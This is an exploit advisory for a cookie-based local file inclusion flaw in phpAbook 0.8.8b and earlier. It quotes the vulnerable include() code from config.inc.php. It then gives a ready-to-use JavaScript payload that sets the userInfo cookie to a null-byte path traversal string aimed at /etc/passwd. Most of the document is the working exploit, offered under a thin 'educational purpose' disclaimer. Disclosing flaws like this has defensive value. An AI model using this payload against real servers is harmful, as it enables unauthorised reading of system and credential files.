# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability # url: http://sourceforge.net/projects/phpabook/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # *Requirements: magic_quotes_gpc = Off vuln file: include/config.inc.php vuln code: x: >... 61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") { $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]); $userName = $userArray[0]; $userID = $userArray[1]; $userLang = $userArray[2]; include("include/lang/$userLang/inc.messages.php"); 67: } x: <... Proof of Concept (function 'explode' PHP): [0] = JosS; [1] = JosS; [2] = ../../../../etc/passwd%00; ---> INCLUDE exploit: javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; Ingenious work :D